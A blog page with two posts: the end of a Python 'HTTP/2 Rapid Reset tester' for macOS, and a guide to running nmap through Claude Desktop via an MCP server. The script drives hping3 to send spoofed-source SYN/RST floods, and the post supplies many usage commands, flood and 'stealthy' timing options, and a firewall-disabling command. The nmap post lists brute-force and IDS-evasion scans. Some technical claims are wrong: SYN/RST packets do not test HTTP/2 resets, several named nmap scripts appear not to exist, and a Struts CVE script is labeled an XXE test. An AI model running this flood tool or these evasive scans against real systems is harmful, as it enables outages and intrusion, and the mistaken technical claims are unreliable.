            rate = results['total_packets'] / duration
            print(f"Average packet rate:     {rate:.0f} packets/second")

        print("\n" + "=" * 60)
        print("ASSESSMENT")
        print("=" * 60)

        if results['failed_packets'] > results['total_packets'] * 0.5:
            print("WARNING: High failure rate detected")
            print("  Check network connectivity and firewall rules")
        elif results['total_packets'] > 0:
            print("Test completed successfully")
            print("  Monitor target server for:")
            print("    Connection state table exhaustion")
            print("    CPU/memory utilization spikes")
            print("    Application performance degradation")

        print("=" * 60 + "\n")

def main():
    parser = argparse.ArgumentParser(
        description='Test web servers for HTTP/2 Rapid Reset vulnerability (macOS version)',
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""
Examples:
  # Basic test with CIDR block
  sudo python3 http2rapidresettester_macos.py --host example.com --cidr 192.168.1.0/24 --packets 1000

  # Specify network interface
  sudo python3 http2rapidresettester_macos.py --host example.com --cidr 192.168.1.0/24 --interface en0 --packets 1000

  # Flood mode for 60 seconds
  sudo python3 http2rapidresettester_macos.py --host example.com --cidr 10.0.0.0/16 --flood --duration 60

  # High intensity test with specific interface
  sudo python3 http2rapidresettester_macos.py --host example.com --cidr 172.16.0.0/12 --interface en1 --packets 10000 --packetsperip 50

  # Test without IP spoofing
  sudo python3 http2rapidresettester_macos.py --host example.com --packets 1000

Prerequisites:
  1. Install hping3: brew install hping
  2. Run with sudo for raw socket access
  3. Check available interfaces: ifconfig

Note: IP spoofing works reliably with hping3 across different network environments.
        """
    )

    # Connection parameters
    parser.add_argument('--host', required=True, help='Target hostname or IP address')
    parser.add_argument('--port', type=int, default=443, help='Target port (default: 443)')
    parser.add_argument('--cidr', help='CIDR block for source IP spoofing (e.g., 192.168.1.0/24)')
    parser.add_argument('--interface', help='Network interface to use (e.g., en0, en1). Optional.')
    parser.add_argument('--timeout', type=int, default=30, help='Command timeout in seconds (default: 30)')

    # Test mode parameters
    parser.add_argument('--flood', action='store_true', help='Enable flood mode (continuous attack)')
    parser.add_argument('--duration', type=int, default=60, help='Duration for flood mode in seconds (default: 60)')
    parser.add_argument('--packetrate', type=int, default=1000, help='Target packet rate for flood mode (default: 1000)')

    # Normal mode parameters
    parser.add_argument('--packets', type=int, default=1000,
                       help='Total number of packets to send (default: 1000)')
    parser.add_argument('--packetsperip', type=int, default=10,
                       help='Number of packets per source IP before switching (default: 10)')
    parser.add_argument('--resetratio', type=float, default=1.0,
                       help='Ratio of RST to SYN packets (default: 1.0)')
    parser.add_argument('--burstdelay', type=float, default=0.01,
                       help='Delay between packet bursts in seconds (default: 0.01)')

    # Other options
    parser.add_argument('--verbose', action='store_true', help='Enable verbose output')

    args = parser.parse_args()

    # Print header
    print("=" * 60)
    print("HTTP/2 Rapid Reset Vulnerability Tester for macOS")
    print("CVE-2023-44487")
    print("Using hping3 for packet crafting")
    print("=" * 60)
    print(f"Target: {args.host}:{args.port}")
    if args.cidr:
        print(f"Source CIDR: {args.cidr}")
    else:
        print("Source IP: Local IP (no spoofing)")
    if args.interface:
        print(f"Interface: {args.interface}")
    print("=" * 60)

    # Create tester instance
    try:
        tester = HTTP2RapidResetTester(
            host=args.host,
            port=args.port,
            cidr_block=args.cidr,
            timeout=args.timeout,
            verbose=args.verbose,
            interface=args.interface
        )
    except RuntimeError as e:
        print(f"ERROR: {e}")
        sys.exit(1)

    try:
        if args.flood:
            # Run flood mode
            results = tester.flood_mode(
                duration=args.duration,
                packet_rate=args.packetrate
            )
        else:
            # Run normal rapid reset test
            results = tester.rapid_reset_test(
                num_packets=args.packets,
                packets_per_ip=args.packetsperip,
                reset_ratio=args.resetratio,
                delay_between_bursts=args.burstdelay
            )

        # Display results
        tester.display_results(results)

    except KeyboardInterrupt:
        print("\nTest interrupted by user")
        sys.exit(0)
    except Exception as e:
        print(f"\nFatal error: {e}")
        import traceback
        if args.verbose:
            traceback.print_exc()
        sys.exit(1)

if __name__ == '__main__':
    main()
EOF
chmod +x http2rapidresettester_macos.py

Using the Testing Script on macOS

Summary of usage:

# Use specific interface
sudo python3 http2rapidresettester_macos.py --host example.com --cidr 192.168.1.0/24 --interface en0 --packets 1000

# Use WiFi interface (typically en0 on MacBooks)
sudo python3 http2rapidresettester_macos.py --host example.com --interface en0 --packets 500

# Use Ethernet interface
sudo python3 http2rapidresettester_macos.py --host example.com --interface en1 --cidr 10.0.0.0/16 --flood --duration 30

# Without interface (uses default routing)
sudo python3 http2rapidresettester_macos.py --host example.com --packets 1000

Test your server with CIDR block spoofing:

sudo python3 http2rapidresettester_macos.py --host example.com --cidr 192.168.1.0/24 --packets 1000

Advanced Examples

High intensity test (use cautiously in test environments):

sudo python3 http2rapidresettester_macos.py \
    --host staging.example.com \
    --cidr 10.0.0.0/16 \
    --packets 5000 \
    --packetsperip 50

Flood mode for sustained testing:

sudo python3 http2rapidresettester_macos.py \
    --host test.example.com \
    --cidr 172.16.0.0/12 \
    --flood \
    --duration 60 \
    --packetrate 500

Test without IP spoofing:

sudo python3 http2rapidresettester_macos.py \
    --host example.com \
    --packets 1000

Verbose mode for debugging:

sudo python3 http2rapidresettester_macos.py \
    --host example.com \
    --cidr 192.168.1.0/24 \
    --packets 100 \
    --verbose

Gradual escalation test (start small, increase if needed):

# Start with 50 packets
sudo python3 http2rapidresettester_macos.py --host example.com --cidr 192.168.1.0/24 --packets 50

# If server handles it well, increase
sudo python3 http2rapidresettester_macos.py --host example.com --cidr 192.168.1.0/24 --packets 200

# Final aggressive test
sudo python3 http2rapidresettester_macos.py --host example.com --cidr 192.168.1.0/24 --packets 1000

Interpreting Results

The script outputs packet statistics including:

  • Total packets sent (SYN and RST combined)
  • Number of SYN packets
  • Number of RST packets
  • Failed packet count
  • Number of unique source IPs used
  • Average packet rate
  • Test duration

What to Monitor

Monitor your target server for:

  • Connection state table exhaustion: Check netstat or ss output for connection counts
  • CPU and memory utilization spikes: Use Activity Monitor or top command
  • Application performance degradation: Monitor response times and error rates
  • Firewall or rate limiting triggers: Check firewall logs and rate limiting counters

Protected Server Indicators

  • High failure rate in the test results
  • Server actively blocking or rate limiting connections
  • Firewall rules triggering during test
  • Connection resets from the server

Vulnerable Server Indicators

  • All packets successfully sent with low failure rate
  • No rate limiting or blocking observed
  • Server continues processing all requests
  • Resource utilization climbs steadily

Why hping3 for macOS?

Using hping3 provides several advantages for macOS users:

Universal IP Spoofing Support

  • Consistent behavior: hping3 provides reliable IP spoofing across different network configurations
  • Proven tool: Industry standard for packet crafting and network testing
  • Better compatibility: Works with most network interfaces and routing configurations

macOS Specific Benefits

  • Native support: Works well with macOS network stack
  • Firewall compatibility: Better integration with macOS firewall
  • Performance: Efficient packet generation on macOS

Reliability Advantages

  • Mature codebase: hping3 has been battle tested for decades
  • Active community: Well documented with extensive community support
  • Cross platform: Same tool works on Linux, BSD, and macOS

macOS Installation and Setup

Installing hping3

# Using Homebrew (recommended)
brew install hping

# Verify installation
which hping3
hping3 --version

Firewall Configuration

macOS firewall may need configuration for raw packet injection:

  1. Open System Preferences > Security & Privacy > Firewall
  2. Click “Firewall Options”
  3. Add Python to allowed applications
  4. Grant network access when prompted

Alternatively, for testing environments:

# Temporarily disable firewall (not recommended for production)
sudo /usr/libexec/ApplicationFirewall/socketfilterfw --setglobalstate off

# Re-enable after testing
sudo /usr/libexec/ApplicationFirewall/socketfilterfw --setglobalstate on

Network Interfaces

List available network interfaces:

ifconfig

Common macOS interfaces:

  • en0: Primary Ethernet/WiFi
  • en1: Secondary network interface
  • lo0: Loopback interface
  • bridge0: Bridged interface (if using virtualization)

Best Practices for Testing

  1. Start with staging/test environments: Never run aggressive tests against production without authorization
  2. Coordinate with your team: Inform security and operations teams before testing
  3. Monitor server metrics: Watch CPU, memory, and connection counts during tests
  4. Test during low traffic periods: Minimize impact on real users if testing production
  5. Gradual escalation: Start with conservative parameters and increase gradually
  6. Document results: Keep records of test results and any configuration changes
  7. Have rollback plans: Be prepared to quickly disable testing if issues arise

Troubleshooting on macOS

Error: “hping3 is not installed”

Install hping3 using Homebrew:

brew install hping

Error: “Operation not permitted”

Make sure you are running with sudo:

sudo python3 http2rapidresettester_macos.py [options]

Error: “No route to host”

Check your network connectivity:

ping example.com
traceroute example.com

Verify your network interface is up:

ifconfig en0

Packets Not Being Sent

Possible causes and solutions:

  1. Firewall blocking: Temporarily disable firewall or add exception
  2. Interface not active: Check ifconfig output
  3. Permission issues: Ensure running with sudo
  4. Wrong interface: Specify interface with hping3 using i flag

Low Packet Rate

Performance optimization tips:

  • Use wired Ethernet instead of WiFi
  • Close other network intensive applications
  • Reduce packet rate target with --packetrate
  • Use smaller CIDR blocks

Monitoring Your Tests

Using tcpdump

Monitor packets in real time:

# Watch SYN packets
sudo tcpdump -i en0 'tcp[tcpflags] & tcp-syn != 0' -n

# Watch RST packets
sudo tcpdump -i en0 'tcp[tcpflags] & tcp-rst != 0' -n

# Watch specific host and port
sudo tcpdump -i en0 host example.com and port 443 -n

# Save to file for later analysis
sudo tcpdump -i en0 -w test_capture.pcap host example.com

Using Wireshark

For detailed packet analysis:

# Install Wireshark
brew install --cask wireshark

# Run Wireshark
sudo wireshark

# Or use tshark for command line
tshark -i en0 -f "host example.com"

Activity Monitor

Monitor system resources during testing:

  1. Open Activity Monitor (Applications > Utilities > Activity Monitor)
  2. Select “Network” tab
  3. Watch “Packets in” and “Packets out”
  4. Monitor “Data sent/received”
  5. Check CPU usage of Python process

Server Side Monitoring

On your target server, monitor:

# Connection states
netstat -an | grep :443 | awk '{print $6}' | sort | uniq -c

# Active connections count
netstat -an | grep ESTABLISHED | wc -l

# SYN_RECV connections
netstat -an | grep SYN_RECV | wc -l

# System resources
top -l 1 | head -10

Understanding IP Spoofing with hping3

How It Works

hping3 creates raw packets at the network layer, allowing you to specify arbitrary source IP addresses. This bypasses normal TCP/IP stack restrictions.

Network Requirements

For IP spoofing to work effectively:

  • Local networks: Works best on LANs you control
  • Direct routing: Requires direct layer 2 access
  • No NAT interference: NAT devices may rewrite source addresses
  • Router configuration: Some routers filter spoofed packets (BCP 38)

Testing Without Spoofing

If IP spoofing is not working in your environment:

# Test without CIDR block
sudo python3 http2rapidresettester_macos.py --host example.com --packets 1000

# This still validates:
# - Rate limiting configuration
# - Stream management
# - Server resilience
# - Resource consumption patterns

Advanced Configuration Options

Custom Packet Timing

# Slower, more stealthy testing
sudo python3 http2rapidresettester_macos.py \
    --host example.com \
    --packets 500 \
    --burstdelay 0.1  # 100ms between bursts

# Faster, more aggressive
sudo python3 http2rapidresettester_macos.py \
    --host example.com \
    --packets 1000 \
    --burstdelay 0.001  # 1ms between bursts

Custom RST to SYN Ratio

# More SYN packets (mimics connection attempts)
sudo python3 http2rapidresettester_macos.py \
    --host example.com \
    --packets 1000 \
    --resetratio 0.3  # 1 RST for every 3 SYN

# Equal SYN and RST (classic rapid reset)
sudo python3 http2rapidresettester_macos.py \
    --host example.com \
    --packets 1000 \
    --resetratio 1.0

Targeting Different Ports

# Test HTTPS (port 443)
sudo python3 http2rapidresettester_macos.py --host example.com --port 443

# Test HTTP/2 on custom port
sudo python3 http2rapidresettester_macos.py --host example.com --port 8443

# Test load balancer
sudo python3 http2rapidresettester_macos.py --host lb.example.com --port 443

Understanding the Attack Surface

When testing your infrastructure:

  1. Test all HTTP/2 endpoints: Web servers, load balancers, API gateways
  2. Verify CDN protection: Test both origin and CDN endpoints
  3. Test direct vs proxied: Compare protection at different layers
  4. Validate rate limiting: Ensure limits trigger at expected thresholds
  5. Confirm monitoring: Verify alerts trigger correctly

Conclusion

The HTTP/2 Rapid Reset vulnerability represents a significant threat to web infrastructure, but with proper patching, configuration, and monitoring, you can effectively protect your systems. This macOS optimized testing script using hping3 allows you to validate your defenses in a controlled manner with reliable IP spoofing capabilities across different network environments.

Remember that security is an ongoing process. Regularly:

  • Update your web server and proxy software
  • Review and adjust HTTP/2 configuration limits
  • Monitor for unusual traffic patterns
  • Test your defenses against emerging threats

By staying vigilant and proactive, you can maintain a resilient web presence capable of withstanding sophisticated DDoS attacks.

Additional Resources


This blog post and testing script are provided for educational and defensive security purposes only. Always obtain proper authorization before testing systems you do not own.

0
0

MacOs: Deep Dive into NMAP using Claude Desktop with an NMAP MCP

Introduction

NMAP (Network Mapper) is one of the most powerful and versatile network scanning tools available for security professionals, system administrators, and ethical hackers. When combined with Claude through the Model Context Protocol (MCP), it becomes an even more powerful tool, allowing you to leverage AI to intelligently analyze scan results, suggest scanning strategies, and interpret complex network data.

In this deep dive, we’ll explore how to set up NMAP with Claude Desktop using an MCP server, and demonstrate 20+ comprehensive vulnerability checks and reconnaissance techniques you can perform using natural language prompts.

Legal Disclaimer: Only scan systems and networks you own or have explicit written permission to test. Unauthorized scanning may be illegal in your jurisdiction.

Prerequisites

  • macOS, Linux, or Windows with WSL
  • Basic understanding of networking concepts
  • Permission to scan target systems
  • Claude Desktop installed

Part 1: Installation and Setup

Step 1: Install NMAP

On macOS:

# Using Homebrew
brew install nmap

# Verify installation

On Linux (Ubuntu/Debian):

Step 2: Install Node.js (Required for MCP Server)

The NMAP MCP server requires Node.js to run.

Mac OS:

brew install node
node --version
npm --version

Step 3: Install the NMAP MCP Server

The most popular NMAP MCP server is available on GitHub. We’ll install it globally:

cd ~/
rm -rf nmap-mcp-server
git clone https://github.com/PhialsBasement/nmap-mcp-server.git
cd nmap-mcp-server
npm install
npm run build

Step 4: Configure Claude Desktop

Edit the Claude Desktop configuration file to add the NMAP MCP server.

On macOS:

CONFIG_FILE="$HOME/Library/Application Support/Claude/claude_desktop_config.json"
USERNAME=$(whoami)

cp "$CONFIG_FILE" "$CONFIG_FILE.backup"

python3 << 'EOF'
import json
import os

config_file = os.path.expanduser("~/Library/Application Support/Claude/claude_desktop_config.json")
username = os.environ['USER']

with open(config_file, 'r') as f:
config = json.load(f)

if 'mcpServers' not in config:
config['mcpServers'] = {}

config['mcpServers']['nmap'] = {
"command": "node",
"args": [
f"/Users/{username}/nmap-mcp-server/dist/index.js"
],
"env": {}
}

with open(config_file, 'w') as f:
json.dump(config, f, indent=2)

print("nmap server added to Claude Desktop config!")
print(f"Backup saved to: {config_file}.backup")
EOF


Step 5: Restart Claude Desktop

Close and reopen Claude Desktop. You should see the NMAP MCP server connected in the bottom-left corner.

Part 2: Understanding NMAP MCP Capabilities

Once configured, Claude can execute NMAP scans through the MCP server. The server typically provides:

  • Host discovery scans
  • Port scanning (TCP/UDP)
  • Service version detection
  • OS detection
  • Script scanning (NSE – NMAP Scripting Engine)
  • Output parsing and interpretation

Part 3: 20 Most Common Vulnerability Checks

For these examples, we’ll use a hypothetical target domain: example-target.com (replace with your authorized target).

1. Basic Host Discovery and Open Ports

Prompt:

Scan example-target.com to discover if the host is up and identify all open ports (1-1000). Use a TCP SYN scan for speed.

What this does: Performs a fast SYN scan on the first 1000 ports to quickly identify open services.

Expected NMAP command:

nmap -sS -p 1-1000 example-target.com

2. Comprehensive Port Scan (All 65535 Ports)

Prompt:

Perform a comprehensive scan of all 65535 TCP ports on example-target.com to identify any services running on non-standard ports.

What this does: Scans every possible TCP port – time-consuming but thorough.

Expected NMAP command:

nmap -p- example-target.com

3. Service Version Detection

Prompt:

Scan the top 1000 ports on example-target.com and detect the exact versions of services running on open ports. This will help identify outdated software.

What this does: Probes open ports to determine service/version info, crucial for finding known vulnerabilities.

Expected NMAP command:

nmap -sV example-target.com

4. Operating System Detection

Prompt:

Detect the operating system running on example-target.com using TCP/IP stack fingerprinting. Include OS detection confidence levels.

What this does: Analyzes network responses to guess the target OS.

Expected NMAP command:

nmap -O example-target.com

5. Aggressive Scan (OS + Version + Scripts + Traceroute)

Prompt:

Run an aggressive scan on example-target.com that includes OS detection, version detection, script scanning, and traceroute. This is comprehensive but noisy.

What this does: Combines multiple detection techniques for maximum information.

Expected NMAP command:

nmap -A example-target.com

6. Vulnerability Scanning with NSE Scripts

Prompt:

Scan example-target.com using NMAP's vulnerability detection scripts to check for known CVEs and security issues in running services.

What this does: Uses NSE scripts from the ‘vuln’ category to detect known vulnerabilities.

Expected NMAP command:

nmap --script vuln example-target.com

7. SSL/TLS Security Analysis

Prompt:

Analyze SSL/TLS configuration on example-target.com (port 443). Check for weak ciphers, certificate issues, and SSL vulnerabilities like Heartbleed and POODLE.

What this does: Comprehensive SSL/TLS security assessment.

Expected NMAP command:

nmap -p 443 --script ssl-enum-ciphers,ssl-cert,ssl-heartbleed,ssl-poodle example-target.com

8. HTTP Security Headers and Vulnerabilities

Prompt:

Check example-target.com's web server (ports 80, 443, 8080) for security headers, common web vulnerabilities, and HTTP methods allowed.

What this does: Tests for missing security headers, dangerous HTTP methods, and common web flaws.

Expected NMAP command:

nmap -p 80,443,8080 --script http-security-headers,http-methods,http-csrf,http-stored-xss example-target.com

Prompt:

Scan example-target.com for SMB vulnerabilities including MS17-010 (EternalBlue), SMB signing issues, and accessible shares.

What this does: Critical for identifying Windows systems vulnerable to ransomware exploits.

Expected NMAP command:

nmap -p 445 --script smb-vuln-ms17-010,smb-vuln-*,smb-enum-shares example-target.com

10. SQL Injection Testing

Prompt:

Test web applications on example-target.com (ports 80, 443) for SQL injection vulnerabilities in common web paths and parameters.

What this does: Identifies potential SQL injection points.

Expected NMAP command:

nmap -p 80,443 --script http-sql-injection example-target.com

11. DNS Zone Transfer Vulnerability

Prompt:

Test if example-target.com's DNS servers allow unauthorized zone transfers, which could leak internal network information.

What this does: Attempts AXFR zone transfer – a serious misconfiguration if allowed.

Expected NMAP command:

nmap --script dns-zone-transfer --script-args dns-zone-transfer.domain=example-target.com -p 53 example-target.com

12. SSH Security Assessment

Prompt:

Analyze SSH configuration on example-target.com (port 22). Check for weak encryption algorithms, host keys, and authentication methods.

What this does: Identifies insecure SSH configurations.

Expected NMAP command:

nmap -p 22 --script ssh-auth-methods,ssh-hostkey,ssh2-enum-algos example-target.com

Prompt:

Check if example-target.com's FTP server (port 21) allows anonymous login and scan for FTP-related vulnerabilities.

What this does: Tests for anonymous FTP access and common FTP security issues.

Expected NMAP command:

nmap -p 21 --script ftp-anon,ftp-vuln-cve2010-4221,ftp-bounce example-target.com

Prompt:

Scan example-target.com's email servers (ports 25, 110, 143, 587, 993, 995) for open relays, STARTTLS support, and vulnerabilities.

What this does: Comprehensive email server security check.

Expected NMAP command:

nmap -p 25,110,143,587,993,995 --script smtp-open-relay,smtp-enum-users,ssl-cert example-target.com

15. Database Server Exposure

Prompt:

Check if example-target.com has publicly accessible database servers (MySQL, PostgreSQL, MongoDB, Redis) and test for default credentials.

What this does: Identifies exposed databases, a critical security issue.

Expected NMAP command:

nmap -p 3306,5432,27017,6379 --script mysql-empty-password,pgsql-brute,mongodb-databases,redis-info example-target.com

16. WordPress Security Scan

Prompt:

If example-target.com runs WordPress, enumerate plugins, themes, and users, and check for known vulnerabilities.

What this does: WordPress-specific security assessment.

Expected NMAP command:

nmap -p 80,443 --script http-wordpress-enum,http-wordpress-users example-target.com

17. XML External Entity (XXE) Vulnerability

Prompt:

Test web services on example-target.com for XML External Entity (XXE) injection vulnerabilities.

What this does: Identifies XXE flaws in XML parsers.

Expected NMAP command:

nmap -p 80,443 --script http-vuln-cve2017-5638 example-target.com

18. SNMP Information Disclosure

Prompt:

Scan example-target.com for SNMP services (UDP port 161) and attempt to extract system information using common community strings.

What this does: SNMP can leak sensitive system information.

Expected NMAP command:

nmap -sU -p 161 --script snmp-brute,snmp-info example-target.com

19. RDP Security Assessment

Prompt:

Check if Remote Desktop Protocol (RDP) on example-target.com (port 3389) is vulnerable to known exploits like BlueKeep (CVE-2019-0708).

What this does: Critical Windows remote access security check.

Expected NMAP command:

nmap -p 3389 --script rdp-vuln-ms12-020,rdp-enum-encryption example-target.com

20. API Endpoint Discovery and Testing

Prompt:

Discover API endpoints on example-target.com and test for common API vulnerabilities including authentication bypass and information disclosure.

What this does: Identifies REST APIs and tests for common API security issues.

Expected NMAP command:

nmap -p 80,443,8080,8443 --script http-methods,http-auth-finder,http-devframework example-target.com

Part 4: Deep Dive Exercises

Deep Dive Exercise 1: Complete Web Application Security Assessment

Scenario: You need to perform a comprehensive security assessment of a web application running at webapp.example-target.com.

Claude Prompt:

I need a complete security assessment of webapp.example-target.com. Please:

1. First, discover all open ports and running services
2. Identify the web server software and version
3. Check for SSL/TLS vulnerabilities and certificate issues
4. Test for common web vulnerabilities (XSS, SQLi, CSRF)
5. Check security headers (CSP, HSTS, X-Frame-Options, etc.)
6. Enumerate web directories and interesting files
7. Test for backup file exposure (.bak, .old, .zip)
8. Check for sensitive information in robots.txt and sitemap.xml
9. Test HTTP methods for dangerous verbs (PUT, DELETE, TRACE)
10. Provide a prioritized summary of findings with remediation advice

Use timing template T3 (normal) to avoid overwhelming the target.

What Claude will do:

Claude will execute multiple NMAP scans in sequence, starting with discovery and progressively getting more detailed. Example commands it might run:

# Phase 1: Discovery
nmap -sV -T3 webapp.example-target.com

# Phase 2: SSL/TLS Analysis
nmap -p 443 -T3 --script ssl-cert,ssl-enum-ciphers,ssl-known-key,ssl-heartbleed,ssl-poodle,ssl-ccs-injection webapp.example-target.com

# Phase 3: Web Vulnerability Scanning
nmap -p 80,443 -T3 --script http-security-headers,http-csrf,http-sql-injection,http-stored-xss,http-dombased-xss webapp.example-target.com

# Phase 4: Directory and File Enumeration
nmap -p 80,443 -T3 --script http-enum,http-backup-finder webapp.example-target.com

# Phase 5: HTTP Methods Testing
nmap -p 80,443 -T3 --script http-methods --script-args http-methods.test-all webapp.example-target.com

Learning Outcomes:

  • Understanding layered security assessment methodology
  • How to interpret multiple scan results holistically
  • Prioritization of security findings by severity
  • Claude’s ability to correlate findings across multiple scans

Deep Dive Exercise 2: Network Perimeter Reconnaissance

Scenario: You’re assessing the security perimeter of an organization with the domain company.example-target.com and a known IP range 198.51.100.0/24.

Claude Prompt:

Perform comprehensive network perimeter reconnaissance for company.example-target.com (IP range 198.51.100.0/24). I need to:

1. Discover all live hosts in the IP range
2. For each live host, identify:
   - Operating system
   - All open ports (full 65535 range)
   - Service versions
   - Potential vulnerabilities
3. Map the network topology and identify:
   - Firewalls and filtering
   - DMZ hosts vs internal hosts
   - Critical infrastructure (DNS, mail, web servers)
4. Test for common network misconfigurations:
   - Open DNS resolvers
   - Open mail relays
   - Unauthenticated database access
   - Unencrypted management protocols (Telnet, FTP)
5. Provide a network map and executive summary

Use slow timing (T2) to minimize detection risk and avoid false positives.

What Claude will do:

# Phase 1: Host Discovery
nmap -sn -T2 198.51.100.0/24

# Phase 2: OS Detection on Live Hosts
nmap -O -T2 198.51.100.0/24

# Phase 3: Comprehensive Port Scan (may suggest splitting into chunks)
nmap -p- -T2 198.51.100.0/24

# Phase 4: Service Version Detection
nmap -sV -T2 198.51.100.0/24

# Phase 5: Specific Service Checks
nmap -p 53 --script dns-recursion 198.51.100.0/24
nmap -p 25 --script smtp-open-relay 198.51.100.0/24
nmap -p 3306,5432,27017 --script mysql-empty-password,pgsql-brute,mongodb-databases 198.51.100.0/24
nmap -p 23,21 198.51.100.0/24

# Phase 6: Vulnerability Scanning on Critical Hosts
nmap --script vuln -T2 [critical-hosts]

Learning Outcomes:

  • Large-scale network scanning strategies
  • How to handle and analyze results from multiple hosts
  • Network segmentation analysis
  • Risk assessment across an entire network perimeter
  • Understanding firewall and filtering detection

Deep Dive Exercise 3: Advanced Vulnerability Research – Zero-Day Hunting

Scenario: You’ve discovered a host running potentially vulnerable services and want to do deep reconnaissance to identify potential zero-day vulnerabilities or chained exploits.

Claude Prompt:

I've found a server at secure-server.example-target.com that's running multiple services. I need advanced vulnerability research:

1. Aggressive version fingerprinting of all services
2. Check for version-specific CVEs in detected software
3. Look for unusual port combinations that might indicate custom applications
4. Test for default credentials on all identified services
5. Check for known backdoors in the detected software versions
6. Test for authentication bypass vulnerabilities
7. Look for information disclosure issues (version strings, debug info, error messages)
8. Test for timing attacks and race conditions
9. Analyze for possible exploit chains (e.g., LFI -> RCE)
10. Provide detailed analysis with CVSS scores and exploit availability

Run this aggressively (-T4) as we have permission for intensive testing.

What Claude will do:

# Phase 1: Aggressive Fingerprinting
nmap -sV --version-intensity 9 -T4 secure-server.example-target.com

# Phase 2: All Vulnerability Scripts
nmap --script vuln,exploit -T4 secure-server.example-target.com

# Phase 3: Default Credential Testing
nmap --script auth -T4 secure-server.example-target.com

# Phase 4: Backdoor Detection
nmap --script backdoor-check,unusual-port -T4 secure-server.example-target.com

# Phase 5: Authentication Testing
nmap --script auth-bypass,brute -T4 secure-server.example-target.com

# Phase 6: Information Disclosure
nmap --script banner,http-errors,http-git,http-svn-enum -T4 secure-server.example-target.com

# Phase 7: Service-Specific Deep Dives
# (Claude will run targeted scripts based on discovered services)

After scans, Claude will:

  • Cross-reference detected versions with CVE databases
  • Explain potential exploit chains
  • Provide PoC (Proof of Concept) suggestions
  • Recommend remediation priorities
  • Suggest additional manual testing techniques

Learning Outcomes:

  • Advanced NSE scripting capabilities
  • How to correlate vulnerabilities for exploit chains
  • Understanding vulnerability severity and exploitability
  • Version-specific vulnerability research
  • Claude’s ability to provide context from its training data about specific CVEs

Part 5: Wide-Ranging Reconnaissance Exercises

Exercise 5.1: Subdomain Discovery and Mapping

Prompt:

Help me discover all subdomains of example-target.com and create a complete map of their infrastructure. For each subdomain found:
- Resolve its IP addresses
- Check if it's hosted on the same infrastructure
- Identify the services running
- Note any interesting or unusual findings

Also check for common subdomain patterns like api, dev, staging, admin, etc.

What this reveals: Shadow IT, forgotten dev servers, API endpoints, and the organization’s infrastructure footprint.

Exercise 5.2: API Security Testing

Prompt:

I've found an API at api.example-target.com. Please:
1. Identify the API type (REST, GraphQL, SOAP)
2. Discover all available endpoints
3. Test authentication mechanisms
4. Check for rate limiting
5. Test for IDOR (Insecure Direct Object References)
6. Look for excessive data exposure
7. Test for injection vulnerabilities
8. Check API versioning and test old versions for vulnerabilities
9. Verify CORS configuration
10. Test for JWT vulnerabilities if applicable

Exercise 5.3: Cloud Infrastructure Detection

Prompt:

Scan example-target.com to identify if they're using cloud infrastructure (AWS, Azure, GCP). Look for:
- Cloud-specific IP ranges
- S3 buckets or blob storage
- Cloud-specific services (CloudFront, Azure CDN, etc.)
- Misconfigured cloud resources
- Storage bucket permissions
- Cloud metadata services exposure

Exercise 5.4: IoT and Embedded Device Discovery

Prompt:

Scan the network 192.168.1.0/24 for IoT and embedded devices such as:
- IP cameras
- Smart TVs
- Printers
- Network attached storage (NAS)
- Home automation systems
- Industrial control systems (ICS/SCADA if applicable)

Check each device for:
- Default credentials
- Outdated firmware
- Unencrypted communications
- Exposed management interfaces

Exercise 5.5: Checking for Known Vulnerabilities and Old Software

Prompt:

Perform a comprehensive audit of example-target.com focusing on outdated and vulnerable software:

1. Detect exact versions of all running services
2. For each service, check if it's end-of-life (EOL)
3. Identify known CVEs for each version detected
4. Prioritize findings by:
   - CVSS score
   - Exploit availability
   - Exposure (internet-facing vs internal)
5. Check for:
   - Outdated TLS/SSL versions
   - Deprecated cryptographic algorithms
   - Unpatched web frameworks
   - Old CMS versions (WordPress, Joomla, Drupal)
   - Legacy protocols (SSLv3, TLS 1.0, weak ciphers)
6. Generate a remediation roadmap with version upgrade recommendations

Expected approach:

# Detailed version detection
nmap -sV --version-intensity 9 example-target.com

# Check for versionable services
nmap --script version,http-server-header,http-generator example-target.com

# SSL/TLS testing
nmap -p 443 --script ssl-cert,ssl-enum-ciphers,sslv2,ssl-date example-target.com

# CMS detection
nmap -p 80,443 --script http-wordpress-enum,http-joomla-brute,http-drupal-enum example-target.com

Claude will then analyze the results and provide:

  • A table of detected software with current versions and latest versions
  • CVE listings with severity scores
  • Specific upgrade recommendations
  • Risk assessment for each finding

Part 6: Advanced Tips and Techniques

6.1 Optimizing Scan Performance

Timing Templates:

  • -T0 (Paranoid): Extremely slow, for IDS evasion
  • -T1 (Sneaky): Slow, minimal detection risk
  • -T2 (Polite): Slower, less bandwidth intensive
  • -T3 (Normal): Default, balanced approach
  • -T4 (Aggressive): Faster, assumes good network
  • -T5 (Insane): Extremely fast, may miss results

Prompt:

Explain when to use each NMAP timing template and demonstrate the difference by scanning example-target.com with T2 and T4 timing.

6.2 Evading Firewalls and IDS

Prompt:

Scan example-target.com using techniques to evade firewalls and intrusion detection systems:
- Fragment packets
- Use decoy IP addresses
- Randomize scan order
- Use idle scan if possible
- Spoof MAC address (if on local network)
- Use source port 53 or 80 to bypass egress filtering

Expected command examples:

# Fragmented packets
nmap -f example-target.com

# Decoy scan
nmap -D RND:10 example-target.com

# Randomize hosts
nmap --randomize-hosts example-target.com

# Source port spoofing
nmap --source-port 53 example-target.com

6.3 Creating Custom NSE Scripts with Claude

Prompt:

Help me create a custom NSE script that checks for a specific vulnerability in our custom application running on port 8080. The vulnerability is that the /debug endpoint returns sensitive configuration data without authentication.

Claude can help you write Lua scripts for NMAP’s scripting engine!

6.4 Output Parsing and Reporting

Prompt:

Scan example-target.com and save results in all available formats (normal, XML, grepable, script kiddie). Then help me parse the XML output to extract just the critical and high severity findings for a report.

Expected command:

nmap -oA scan_results example-target.com

Claude can then help you parse the XML file programmatically.

Part 7: Responsible Disclosure and Next Steps

After Finding Vulnerabilities

  1. Document everything: Keep detailed records of your findings
  2. Prioritize by risk: Use CVSS scores and business impact
  3. Responsible disclosure: Follow the organization’s security policy
  4. Remediation tracking: Help create an action plan
  5. Verify fixes: Re-test after patches are applied

Using Claude for Post-Scan Analysis

Prompt:

I've completed my NMAP scans and found 15 vulnerabilities. Here are the results: [paste scan output]. 

Please:
1. Categorize by severity (Critical, High, Medium, Low, Info)
2. Explain each vulnerability in business terms
3. Provide remediation steps for each
4. Suggest a remediation priority order
5. Draft an executive summary for management
6. Create technical remediation tickets for the engineering team

Claude excels at translating technical scan results into actionable business intelligence.

Part 8: Continuous Monitoring with NMAP and Claude

